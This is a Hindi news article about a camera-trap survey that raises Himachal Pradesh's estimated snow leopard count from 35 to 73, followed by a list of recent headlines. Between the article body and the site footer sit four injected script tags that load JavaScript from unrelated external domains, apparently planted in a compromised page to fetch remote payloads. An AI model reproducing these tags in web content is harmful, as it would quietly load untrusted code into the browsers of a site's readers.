Categories: हिमाचल

हिमाचल के राज्य पशु स्नो लेपर्ड की संख्या 35 से 73, कैमरों के सर्वे में हुआ ख़ुलासा

<p>हिमाचल वन्य प्राणी जीवन के लिए सुखद ख़बर सामने आई है। हिमाचल के ऊंचाई वाले क्षेत्रों में दुनिया के दुर्लभ वन्य प्राणी में शुमार स्नो लैपर्ड यानी बर्फानी तेंदुए की अनुमानित तादाद 73 आंकी गई है। ये संख्या इससे पहले 35 सामने आती रही है। इनमें शावक शामिल नहीं है। इसका प्राकृतिक वास 26112 वर्ग किलोमीटर क्षेत्र में पाया गया है। प्रदेश में पहली बार इसका न केवल सर्वे हुआ बल्कि विज्ञानिक आधार पर गिनती भी की गई है। इससे पता चला है कि यह तेंदुआ जिन जानवरों का शिकार करता है, उनकी&nbsp; संख्या भी काफी अधिक है। इनमें आइबेक्स, भरल और ब्लूशिप शामिल हैं।</p>

<p>स्नो लेपर्ड को लेकर प्रकृति संरक्षण फाउंडेशन नामक बेंगलूरु की संस्था के माध्यम से सर्वेक्षण करवाया गया। संख्या का आकलन वन विभाग के वन्य प्राणी विंग के सहयोग से पूरा किया। इसमें पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय के प्रोटोकॉल के आधार पर किया गया। पीसीसीएफ वन्य प्राणी विंग अर्चना शर्मा का कहना है हिमाचल में पहली बार कैमरा लगाकर गिनती की गई है। दस विभिन्न जगहों पट कैमरा लगाए गए थे। इस तरह से पहले कभी सर्वे नहीं हुआ। कई साइट पर तो स्नो लैपर्ड बार-बार देखे गए। इस बार रेडियो कॉलरिंग के बजाय कैमरों का सहारा लिया गया।</p>

<p>बर्फ़ानी तेंदुआ हिमालय के ऊंची पहाड़ियों में पाया जाता है। बर्फानी तेंदुआ हिमाचल के साथ-साथ चार अन्य पहाड़ी राज्यों जम्मू-कश्मीर, उतराखंड, सिक्किम और अरूणाचल प्रदेश में पाया जाता है। देश में इनकी संख्या करीब 500 के आसपास है। हिमाचल में इनकी संख्या करीब 100 के करीब मानी जाती रही है। अब नए आधुनिक सर्वे में इनकी संख्या 73 सामने आई है। हिमाचल में बर्फ़ानी तेंदुए की संख्या इससे भी ज़्यादा होने की उम्मीद है।</p>

<p><img src=”/media/gallery/images/image(8705).jpeg” style=”height:181px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1617862401937″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल में 2 दिन बाद एक्टिव होगा वेस्टर्न डिस्टरबेंस:9-10 अक्टूबर को बारिश; बढ़ेगी ठंड, अभी तापमान सामान्य से ज्यादा

Shimla: हिमाचल प्रदेश में दो दिन बाद पश्चिमी विक्षोभ (WD) एक्टिव हो रहा है। इससे…

1 hour ago

Himachal: हिमाचल प्रदेश के बिजली उपभोक्ताओं को सब्सिडी अब सीधे बैंक खाते में मिलेगी

Himachal power subsidy:  हिमाचल प्रदेश के बिजली उपभोक्ताओं को अब बिजली पर मिलने वाली सब्सिडी…

2 hours ago

Mandi News: नवरात्रों में माता बगलामुखी मंदिर में भक्तों का उमड़ा सैलाब, भक्तों की मनोकामनाएं हो रही हैं पूर्ण

Baglamukhi Temple  : सदर विधानसभा क्षेत्र के तुंगल में स्थित प्रसिद्ध देवी माता बगलामुखी मंदिर…

2 hours ago

Pakistan News: शादी की मनाही पर लड़की ने परिवार को दिया जहर, 13 की मौत

Pakistan family poisoned murder : पाकिस्तान के सिंध प्रांत में एक दिल दहला देने वाली…

2 hours ago

मुख्यमंत्री सुक्खू ने अचानक किया IGMC शिमला का निरीक्षण, मरीजों से लिया फीडबैक

CM Sukhu visits IGMC Shimla:  हिमाचल प्रदेश के मुख्यमंत्री सुखविंद्र सिंह सुक्खू सोमवार सुबह 7:00…

3 hours ago

नवाचार को बढ़ावा दे रहा एटीसी शाहपुर

नवीन तकनीक और प्रौद्योगिकी से आत्मनिर्भरता की ओर बढ़ रहे कदम Kangra:  उपयुक्त प्रौद्योगिकी केन्द्र…

20 hours ago